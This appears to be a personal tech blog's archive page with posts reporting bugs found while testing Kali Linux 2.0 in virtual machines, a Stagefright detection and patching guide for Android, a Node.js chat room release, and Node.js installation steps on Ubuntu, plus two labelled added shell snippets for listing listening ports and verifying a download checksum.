deb-src http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
deb-src http://security.kali.org/kali-security/ sana/updates main contrib non-free


(B) Install VirtualBox 5.0 Guest Additions CD

When you are going to install VirtualBox 5.0 Guest Additions CD, you need to install dkms first :

apt-get install dkms

* It will also install the related header files. If not, you need to install the header files yourself.

When installing the VirtualBox Guest Additions CD, you may encounter the following error :

*** Error in `systemctl': double free or corruption (fasttop): 0x00007fc0cb648ae0 ***

It should be a systemctl error. I do not know what it affects so far. After checking the dmesg messages, the error is due to :

systemd[1]: Cannot add dependency job for unit vboxadd-service.service, ignoring: Unit vboxadd-service.service failed to load: No such file or directory.

It is recommended to uninstall the Guest Additions CD for the moment, and some features will not be available on the guest virtual machine.

(C) Uninstall VirtualBox 5.0 Guest Additions CD

To uninstall VirtualBox Guest Additions, run :

/opt/VBoxGuestAdditions-5.0.0/uninstall.sh

This error will show again :

*** Error in `systemctl': double free or corruption (fasttop): 0x00007f124e3f2ae0 ***

(D) Applications not working properly

The following applications are launched from the Quick Menu on the left hand side of the screen.

armitage - it cannot be launched
Maltego - it launches but it cannot be operated and it cannot be quit either
BeEF - it shows an error and no login screen is displayed UNLESS you run "beef start" at "System Services" under the "Applications" menu

There may be some more applications that do not work, such as "system log", "VLC media player", "ImageMagick", etc. I cannot test them all one by one as there are too many.

* Even if the VirtualBox Guest Additions is uninstalled or Kali 2.0 is reinstalled, the captioned applications still do not work properly

** Other applications on the Applications menu are not tested, nor are those not in the Applications menu

*** Running BeEF produces the following error :
(process:1371): GLib-CRITICAL **: g_slice_set_config: assertion 'sys_page_size = 0' failed

(E) Conclusion

Kali Linux 2.0 was not well tested before it was released. It is very disappointing. Kali 2.0 is slower than 1.1.0a on the same testing machine. Or you may need a more powerful computer or laptop to run it. Some applications on the Quick Menu cannot run properly in this release. DISAPPOINTED!

That's all! See you.


Update on August 12, 2015

I conducted a random test on Kali Linux 2.0 and found the following :

redis-server is running in the background.

Apache2 is listening on TCP6 only instead of both TCP4 and TCP6.

OpenVAS cannot be started properly via "Applications", "System services", "openvas start". A systemd error is produced.

It seems that systemd is buggy.
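A quick way to reproduce the two observations above (Apache2 bound to TCP6 only, redis-server listening in the background) on any Linux guest is to parse the `ss -tln` listener table. The script below is an added example, not part of the original post; it runs over a constructed sample of `ss` output and lists the ports that have an IPv6 listener but no IPv4 listener, and the ports bound to a wildcard address (reachable from outside the guest). On a live system pipe `ss -tln` into the same functions.

```shell
# Added example (not from the original post): inventory TCP listeners from
# `ss -tln` output. Handles both the old ss address style (*:22, :::22)
# and the newer one (0.0.0.0:22, [::]:22).

# Constructed sample of `ss -tln` output mirroring the post's observations:
# sshd on v4+v6, Apache2 on v6 only, redis on loopback only.
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128    *:22                *:*
LISTEN 0      128    :::22               :::*
LISTEN 0      128    :::80               :::*
LISTEN 0      128    127.0.0.1:6379      *:*'

# Emit "port family address" per LISTEN row. The port is whatever follows
# the last ':'; IPv6 addresses contain "::" (old style) or start with "[".
_listeners() {
  awk '$1 == "LISTEN" {
    addr = $4
    n = split(addr, p, ":")
    fam = (addr ~ /::/ || addr ~ /^\[/) ? "v6" : "v4"
    print p[n], fam, addr
  }'
}

# Ports that have an IPv6 listener but no IPv4 listener (the Apache2 case).
v6_only_ports() {
  _listeners | awk '
    $2 == "v6" { v6[$1] = 1 }
    $2 == "v4" { v4[$1] = 1 }
    END { for (port in v6) if (!(port in v4)) print port }' | sort -n
}

# Ports bound to a wildcard address, i.e. exposed beyond the guest itself;
# loopback-only services such as redis on 127.0.0.1 are left out.
wildcard_ports() {
  _listeners | awk '$3 ~ /^(\*|0\.0\.0\.0|::|\[::\]):[0-9]+$/ { print $1 }' \
    | sort -un
}

printf '%s\n' "$SAMPLE_SS" | v6_only_ports    # 80
printf '%s\n' "$SAMPLE_SS" | wildcard_ports   # 22 80
```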


Update on August 13, 2015

After talking with the founder of Offensive Security (muts), I am going to install Kali Linux 2.0 on other virtual machine software to see the result.

I tried to install Kali Linux 2.0 on VMWare Workstation 11 for Linux on a laptop (Lenovo Thinkpad X200 with 4GB RAM) but it failed in the middle and the installation never completed. I do not have Workstation 12, so I cannot test it.

Then, I picked up another laptop (Lenovo Thinkpad X201s with 8GB RAM) which is running VirtualBox 4.3.30 on Ubuntu 14.04. I assigned 4GB RAM to Kali. The installation was smooth. Maybe the Kali Linux repos server is out of the DDoS. (The Kali Linux repos server had been DDoSed for hours since the release, according to the founder of Offensive Security.)

The VirtualBox Guest Additions CD is installed without problem. However, "armitage", "system log", "VLC media player" and "ImageMagick" do not launch. Meanwhile, "redis-server" is running in the background; "Apache2" is listening on TCP6 only. "systemd" errors are produced on selecting "openvas start".

On the other hand, "Maltego" and "BeEF" are working properly with only one click.

Kali Linux 2.0 is running fast and responsive on VirtualBox 4.3.30.

Some users at #kali-linux (IRC channel) found some weird problems, such as "thin.services" is running and making the system very slow.

Ubuntu 14.04.4 desktop is running smoothly on VirtualBox 5.0. It is suspected that Kali Linux 2.0 is sensitive to the hardware and virtual machine software.

The conclusion is changed to ACCEPTABLE! The Kali Linux Team should do better.


Update on August 13, 2015 (Part 2)

This time, I want to test the Kali Linux 2.0 VirtualBox 64-bit image; it runs with 2GB RAM and a 30GB hard drive.

There is a "kali-proposed-updates.list" at /etc/apt/sources.list.d/ and the content is :

deb http://http.kali.org/kali sana-proposed-updates main contrib non-free

Running on VirtualBox 5.0 on Ubuntu 14.04.3 host :

"armitage" cannot be launched.
"maltego" cannot run properly and it cannot be quit.
"BeEF" launched but no login screen UNLESS run "beef start" at "System services" under "Applications".

"VLC media player" and "ImageMagick" do not work.
"system log" works.
"Apache2" is listening on TCP6 only.
"redis-server" is running in the background.

"dkms" accompanied with only one headers file.
The Guest Additions CD installs with the same "systemctl" error message.

"systemd" errors will be produced on selecting "openvas start".

Running on VirtualBox 4.3.30 on Ubuntu 14.04.3 host :

"armitage" cannot be launched.
"maltego" and "BeEF" can be launched with one click.

"VLC media player" and "ImageMagick" do not work.
"system log" works.
"Apache2" is listening on TCP6 only.
"redis-server" is running in the background.

"dkms" accompanied with only one headers file.
The Guest Additions CD installs with the same "systemctl" error message.

* Not kidding, it has the error message.

"systemd" errors will be produced on selecting "openvas start".

Obviously, the Kali Linux Team did not test their work well before it was released. The content of the VirtualBox image is different from the ISO. The rating still remains ACCEPTABLE!

I will not test any ISO or image files for this release any more. Maybe wait for the next release.

* It seems that this VirtualBox image has the VirtualBox 5.0 Guest Additions CD installed


Update on August 14, 2015

muts stated that I am misinformed. Therefore, I made a very boring video (about 26 minutes long) as proof, which is posted at the beginning of this article today.

The Kali Linux official site asks users to use VirtualBox 4.2.xx or higher.

Armitage was updated yesterday by the Kali Linux Team. Therefore, it is working fine now. Meanwhile, VirtualBox is updated from 5.0.0 to 5.0.2 and the high CPU load on Linux hosts is fixed.

I also tested Debian 8.1 (latest update) in the same environment and installed the Guest Additions CD. I also encountered the "systemctl double free or corruption (fasttop)" error. This error may come from VirtualBox 5.0.x or from Debian.

However, the Kali Linux Team forgot to test their amazing Kali Linux 2.0 with VirtualBox 5.0.x on a Linux host. Therefore, the rating is still ACCEPTABLE.


Update on August 17, 2015

Fedora 22 uses systemd by default. I installed Fedora 22 (64-bit) on VirtualBox 5.0.2 with an Ubuntu 14.04 host without any problem or error, including the Guest Additions CD install.

I also tested Kali Linux 2.0 (64-bit) on VirtualBox 5.0.2 with Mac OSX 10.10.5 and it has similar errors.


Update on August 25, 2015

Since I do not like Kali Linux 2.0, I installed my favourite tools on Ubuntu 14.04 LTS recently (please refer to here). I found out that at least BeEF runs very differently between Kali Linux 2.0 and Ubuntu 14.04 on VirtualBox 5.0.2. Kali Linux 2.0 produces error messages while Ubuntu does not. Both versions of BeEF are 0.4.6.1-alpha. I made a video on that, here you are :




Thursday, August 06, 2015

HOWTO : Stagefright Vulnerabilities Detection and Protection on Android

What are the Stagefright vulnerabilities in Android?

Android devices running Android versions 2.2 through 5.1.1_r5 contain vulnerabilities in the Stagefright media playback engine. Exploitation of these vulnerabilities may allow an attacker to access multimedia files or potentially take control of a vulnerable device.

Detection

To test whether your Android device is vulnerable to the Stagefright vulnerabilities, you can use the following app by Zimperium INC.

Google Play - Stagefright Detector by Zimperium INC

Protection

It is recommended to update/upgrade your Android ROM to a non-vulnerable version. If your vendor does not release any update/upgrade, you can perform the following steps as a workaround.

Workaround to protect your Android device

Remarks

I confirmed, using Google Play - Stagefright Detector by Zimperium INC, that CyanogenMod 12.1 Nightly for OnePlus One has fixed the Stagefright vulnerabilities, while OnePlus One v5.0.2 (Cyanogen OS version 12.0-YNG1TAS2I3) and Google Nexus 5 v5.1.1 (Build number LMY48B) are still vulnerable to the Stagefright vulnerabilities at the time of this writing.

It is also confirmed that CyanogenMod 12.0 and 12.1 are fixed for the vulnerabilities. Or, you may consider flashing a CyanogenMod ROM if your device is supported.

If you have OnePlus One, you can follow this guide to update/upgrade your OnePlus One.

That's all! See you.

Monday, August 03, 2015

Node Chat Room (NodeChat)

The Node Chat Room (NodeChat) is developed with Node.js and is forked from "Smashing Node.js: JavaScript Everywhere" Chapter 6. It is modified by Samiux and released under the GPLv3 License.

It provides basic chat room features, including private messages. It does not save anything on the server.




You can download it here.

That's all! See you.

Saturday, August 01, 2015

HOWTO : Install Node.js 0.12.7 on Ubuntu 14.04.2 LTS x86_64

Install node.js binaries :

wget https://nodejs.org/dist/v0.12.7/node-v0.12.7-linux-x64.tar.gz

cd /usr/local && sudo tar --strip-components 1 -xzf ~/node-v0.12.7-linux-x64.tar.gz

node --version
npm --version
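Before extracting a downloaded tarball over /usr/local with root privileges, a practitioner would verify it against the SHASUMS256.txt that nodejs.org publishes in the same dist directory as the tarball. The function below is an added example, not part of the original post; it refuses to extract when the checksum entry is missing or does not match, and otherwise performs the same `--strip-components 1` extraction as above. Run it as root (or under sudo) when the prefix is /usr/local.

```shell
# Added example (not from the original post): verify the Node.js tarball
# against SHASUMS256.txt before unpacking it into the install prefix.
# On a real install, fetch the sums file from the same directory first:
#   wget https://nodejs.org/dist/v0.12.7/SHASUMS256.txt
#
# Arguments: TARBALL SUMS [PREFIX]; PREFIX defaults to /usr/local.
# Returns 0 on success, 1 on checksum mismatch, 2 if SUMS has no entry.
verify_and_install_node() {
  tarball=$1
  sums=$2
  prefix=${3:-/usr/local}
  name=$(basename "$tarball")

  # SHASUMS256.txt lines look like: "<sha256>  <filename>"
  expected=$(awk -v f="$name" '$2 == f { print $1; exit }' "$sums")
  if [ -z "$expected" ]; then
    echo "verify: no checksum entry for $name in $sums" >&2
    return 2
  fi

  actual=$(sha256sum "$tarball" | awk '{ print $1 }')
  if [ "$actual" != "$expected" ]; then
    echo "verify: checksum MISMATCH for $name, refusing to extract" >&2
    return 1
  fi

  echo "verify: checksum OK for $name"
  # Same layout as the post's `cd /usr/local && tar --strip-components 1 ...`
  tar --strip-components 1 -xzf "$tarball" -C "$prefix"
}
```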


Install express :

sudo npm install -g express

Install express executable :

sudo npm install -g express-generator

Create a project named blog, for example :

express blog

cd blog

sudo npm install

To run the blog project :

npm start

Open the browser at http://localhost:3000 and you will see a sample site.

Now, you can edit the files in the blog directory to make your site.

Remark :

If you are compiling Node.js from source, you need the following packages :

sudo apt-get install build-essential libssl-dev apache2-utils

That's all! See you.